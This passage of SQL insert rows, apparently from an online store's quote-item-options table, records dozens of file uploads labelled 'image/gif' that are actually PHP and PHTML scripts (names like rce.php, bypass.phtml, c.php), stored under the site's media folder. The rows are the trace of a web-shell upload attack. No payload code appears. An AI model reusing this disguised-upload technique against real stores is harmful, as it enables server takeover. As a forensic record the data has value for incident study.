(263, 251, 2062, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_1.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_1.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_1.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"23fb1a635e6905639ee7\"}},\"qty\":1}'),
(264, 252, 2062, 'info_buyRequest', '{\"options\":{\"711\":{\"type\":\"image\\/gif\",\"title\":\"711index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/1\\/711index_1.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/1\\/711index_1.php\",\"order_path\":\"custom_options\\/quote\\/7\\/1\\/711index_1.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(265, 253, 2062, 'info_buyRequest', '{\"options\":{\"258\":{\"type\":\"image\\/gif\",\"title\":\"258index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/2\\/5\\/258index.php\",\"quote_path\":\"custom_options\\/quote\\/2\\/5\\/258index.php\",\"order_path\":\"custom_options\\/quote\\/2\\/5\\/258index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(266, 254, 2062, 'info_buyRequest', '{\"options\":{\"380\":{\"type\":\"image\\/gif\",\"title\":\"380index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/8\\/380index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/8\\/380index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/8\\/380index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(267, 255, 2062, 'info_buyRequest', '{\"options\":{\"386\":{\"type\":\"image\\/gif\",\"title\":\"386index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/8\\/386index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/8\\/386index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/8\\/386index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(268, 256, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_2.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_2.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_2.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"73ae0ba2011cfe064657\"}},\"qty\":1}'),
(269, 257, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_2.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_2.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_2.php\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"7d613f8334e91d151dd4\"}},\"qty\":1}'),
(270, 258, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_2.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_2.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_2.phtml\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"ad39dd8f31d7b7ddd1c3\"}},\"qty\":1}'),
(271, 259, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_2.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_2.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_2.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"aa2d24ac2500b31d9044\"}},\"qty\":1}'),
(272, 260, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_2.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_2.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_2.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"f18105e95c4793722c95\"}},\"qty\":1}'),
(273, 261, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_2.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_2.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_2.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"c0d5a0f8eb4d632f1089\"}},\"qty\":1}'),
(274, 262, 2062, 'info_buyRequest', '{\"options\":{\"371\":{\"type\":\"image\\/gif\",\"title\":\"371index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/7\\/371index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/7\\/371index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/7\\/371index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(275, 263, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_3.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_3.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_3.php\",\"size\":1464,\"width\":1,\"height\":1,\"secret_key\":\"012e307163886c378aae\"}},\"qty\":1}'),
(276, 264, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_3.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_3.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_3.php\",\"size\":1538,\"width\":1,\"height\":1,\"secret_key\":\"e389c2bda27a3bebaa67\"}},\"qty\":1}'),
(277, 265, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_3.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_3.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_3.phtml\",\"size\":1538,\"width\":1,\"height\":1,\"secret_key\":\"ee775d26fbf2608dc13b\"}},\"qty\":1}'),
(278, 266, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_3.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_3.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_3.php\",\"size\":1513,\"width\":1,\"height\":1,\"secret_key\":\"c0cfc72a4e486ade4958\"}},\"qty\":1}'),
(279, 267, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_3.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_3.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_3.php\",\"size\":1464,\"width\":1,\"height\":1,\"secret_key\":\"fbd85ce595b918dde338\"}},\"qty\":1}'),
(280, 268, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_3.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_3.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_3.php\",\"size\":1464,\"width\":1,\"height\":1,\"secret_key\":\"1065bb65266003610166\"}},\"qty\":1}'),
(281, 269, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_4.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_4.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_4.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"7f3c387101e1ddd9d0e7\"}},\"qty\":1}'),
(282, 270, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_4.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_4.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_4.php\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"be47109167e3cc6ef09e\"}},\"qty\":1}'),
(283, 271, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_4.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_4.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_4.phtml\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"a3a30792df16cb32eb5f\"}},\"qty\":1}'),
(284, 272, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_4.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_4.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_4.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"c4d9a49e96e978d40b93\"}},\"qty\":1}'),
(285, 273, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_4.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_4.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_4.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"5487e4fbbdd2ef7937e4\"}},\"qty\":1}'),
(286, 274, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_4.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_4.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_4.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"baa72d6f010817aa2e11\"}},\"qty\":1}'),
(287, 275, 2062, 'info_buyRequest', '{\"options\":{\"318\":{\"type\":\"image\\/gif\",\"title\":\"318index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/1\\/318index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/1\\/318index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/1\\/318index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(288, 276, 2062, 'info_buyRequest', '{\"options\":{\"959\":{\"type\":\"image\\/gif\",\"title\":\"959index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/9\\/5\\/959index.php\",\"quote_path\":\"custom_options\\/quote\\/9\\/5\\/959index.php\",\"order_path\":\"custom_options\\/quote\\/9\\/5\\/959index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(289, 277, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"ndr05tph.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/n\\/d\\/ndr05tph.php\",\"quote_path\":\"custom_options\\/quote\\/n\\/d\\/ndr05tph.php\",\"order_path\":\"custom_options\\/quote\\/n\\/d\\/ndr05tph.php\",\"size\":389,\"width\":15419,\"height\":28735,\"secret_key\":\"b0bb408d2c9d4ca3369e\"}},\"qty\":1}'),
(290, 278, 2062, 'info_buyRequest', '{\"options\":{\"139\":{\"type\":\"image\\/gif\",\"title\":\"139index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/3\\/139index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/3\\/139index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/3\\/139index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(291, 279, 2062, 'info_buyRequest', '{\"options\":{\"638\":{\"type\":\"image\\/gif\",\"title\":\"638index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/3\\/638index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/3\\/638index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/3\\/638index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(292, 280, 2062, 'info_buyRequest', '{\"options\":{\"856\":{\"type\":\"image\\/gif\",\"title\":\"856index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/8\\/5\\/856index.php\",\"quote_path\":\"custom_options\\/quote\\/8\\/5\\/856index.php\",\"order_path\":\"custom_options\\/quote\\/8\\/5\\/856index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(293, 281, 2062, 'info_buyRequest', '{\"options\":{\"467\":{\"type\":\"image\\/gif\",\"title\":\"467index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/6\\/467index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/6\\/467index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/6\\/467index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(294, 282, 2062, 'info_buyRequest', '{\"options\":{\"474\":{\"type\":\"image\\/gif\",\"title\":\"474index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/4\\/7\\/474index.php\",\"quote_path\":\"custom_options\\/quote\\/4\\/7\\/474index.php\",\"order_path\":\"custom_options\\/quote\\/4\\/7\\/474index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(295, 283, 2062, 'info_buyRequest', '{\"options\":{\"191\":{\"type\":\"image\\/gif\",\"title\":\"191index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/1\\/9\\/191index.php\",\"quote_path\":\"custom_options\\/quote\\/1\\/9\\/191index.php\",\"order_path\":\"custom_options\\/quote\\/1\\/9\\/191index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(296, 284, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_5.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_5.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_5.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"d3513d5bc72b9657883a\"}},\"qty\":1}'),
(297, 285, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_5.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_5.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_5.php\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"6bd2fb60f0f0c1b701ce\"}},\"qty\":1}'),
(298, 286, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_5.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_5.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_5.phtml\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"0c2d6370d0e5e304c84b\"}},\"qty\":1}'),
(299, 287, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_5.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_5.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_5.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"1f37c3f0f0e2eef2136b\"}},\"qty\":1}'),
(300, 288, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_5.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_5.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_5.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"c26b0e0b677c8d463b30\"}},\"qty\":1}'),
(301, 289, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_5.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_5.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_5.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"b2c62b729b757fabac1e\"}},\"qty\":1}'),
(302, 290, 2062, 'info_buyRequest', '{\"options\":{\"306\":{\"type\":\"image\\/gif\",\"title\":\"306index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/0\\/306index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/0\\/306index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/0\\/306index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(303, 291, 2062, 'info_buyRequest', '{\"options\":{\"394\":{\"type\":\"image\\/gif\",\"title\":\"394index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/9\\/394index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/9\\/394index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/9\\/394index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(304, 292, 2062, 'info_buyRequest', '{\"options\":{\"337\":{\"type\":\"image\\/gif\",\"title\":\"337index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/3\\/3\\/337index.php\",\"quote_path\":\"custom_options\\/quote\\/3\\/3\\/337index.php\",\"order_path\":\"custom_options\\/quote\\/3\\/3\\/337index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(305, 293, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"rce.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/r\\/c\\/rce_6.php\",\"quote_path\":\"custom_options\\/quote\\/r\\/c\\/rce_6.php\",\"order_path\":\"custom_options\\/quote\\/r\\/c\\/rce_6.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"5ff2795c2288ba8fb77e\"}},\"qty\":1}'),
(306, 294, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"780index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/8\\/780index_6.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/8\\/780index_6.php\",\"order_path\":\"custom_options\\/quote\\/7\\/8\\/780index_6.php\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"8891f7329da19fa9b084\"}},\"qty\":1}'),
(307, 295, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.phtml\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_6.phtml\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_6.phtml\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_6.phtml\",\"size\":314,\"width\":1,\"height\":1,\"secret_key\":\"91722ee9193fcfbbedb9\"}},\"qty\":1}'),
(308, 296, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"static.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/s\\/t\\/static_6.php\",\"quote_path\":\"custom_options\\/quote\\/s\\/t\\/static_6.php\",\"order_path\":\"custom_options\\/quote\\/s\\/t\\/static_6.php\",\"size\":328,\"width\":1,\"height\":1,\"secret_key\":\"da197de549056473875c\"}},\"qty\":1}'),
(309, 297, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"bypass.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/b\\/y\\/bypass_6.php\",\"quote_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_6.php\",\"order_path\":\"custom_options\\/quote\\/b\\/y\\/bypass_6.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"68137522a354acd305e7\"}},\"qty\":1}'),
(310, 298, 2055, 'info_buyRequest', '{\"options\":{\"99999\":{\"type\":\"image\\/gif\",\"title\":\"c.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/c\\/_\\/c_6.php\",\"quote_path\":\"custom_options\\/quote\\/c\\/_\\/c_6.php\",\"order_path\":\"custom_options\\/quote\\/c\\/_\\/c_6.php\",\"size\":202,\"width\":1,\"height\":1,\"secret_key\":\"fbbecd4a98255a4d1153\"}},\"qty\":1}'),
(311, 299, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"5e8e5mtr.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/e\\/5e8e5mtr.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/e\\/5e8e5mtr.php\",\"order_path\":\"custom_options\\/quote\\/5\\/e\\/5e8e5mtr.php\",\"size\":1018,\"width\":15419,\"height\":28735,\"secret_key\":\"6fc9893a509bea147617\"}},\"qty\":1}'),
(312, 300, 2062, 'info_buyRequest', '{\"options\":{\"696\":{\"type\":\"image\\/gif\",\"title\":\"696index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/6\\/9\\/696index.php\",\"quote_path\":\"custom_options\\/quote\\/6\\/9\\/696index.php\",\"order_path\":\"custom_options\\/quote\\/6\\/9\\/696index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(313, 301, 2062, 'info_buyRequest', '{\"options\":{\"500\":{\"type\":\"image\\/gif\",\"title\":\"500index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/5\\/0\\/500index.php\",\"quote_path\":\"custom_options\\/quote\\/5\\/0\\/500index.php\",\"order_path\":\"custom_options\\/quote\\/5\\/0\\/500index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
(314, 302, 2059, 'info_buyRequest', '{\"options\":{\"12345\":{\"type\":\"image\\/gif\",\"title\":\"01pe0y39.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/0\\/1\\/01pe0y39.php\",\"quote_path\":\"custom_options\\/quote\\/0\\/1\\/01pe0y39.php\",\"order_path\":\"custom_options\\/quote\\/0\\/1\\/01pe0y39.php\",\"size\":1018,\"width\":15419,\"height\":28735,\"secret_key\":\"6fc9893a509bea147617\"}},\"qty\":1}'),
(315, 303, 2062, 'info_buyRequest', '{\"options\":{\"767\":{\"type\":\"image\\/gif\",\"title\":\"767index.php\",\"fullpath\":\"\\/var\\/www\\/vhosts\\/bismoy.com\\/httpdocs\\/pub\\/media\\/custom_options\\/quote\\/7\\/6\\/767index.php\",\"quote_path\":\"custom_options\\/quote\\/7\\/6\\/767index.php\",\"order_path\":\"custom_options\\/quote\\/7\\/6\\/767index.php\",\"size\":409,\"width\":1,\"height\":1,\"secret_key\":\"6a296a13e7719ee9f869\"}},\"qty\":1}'),
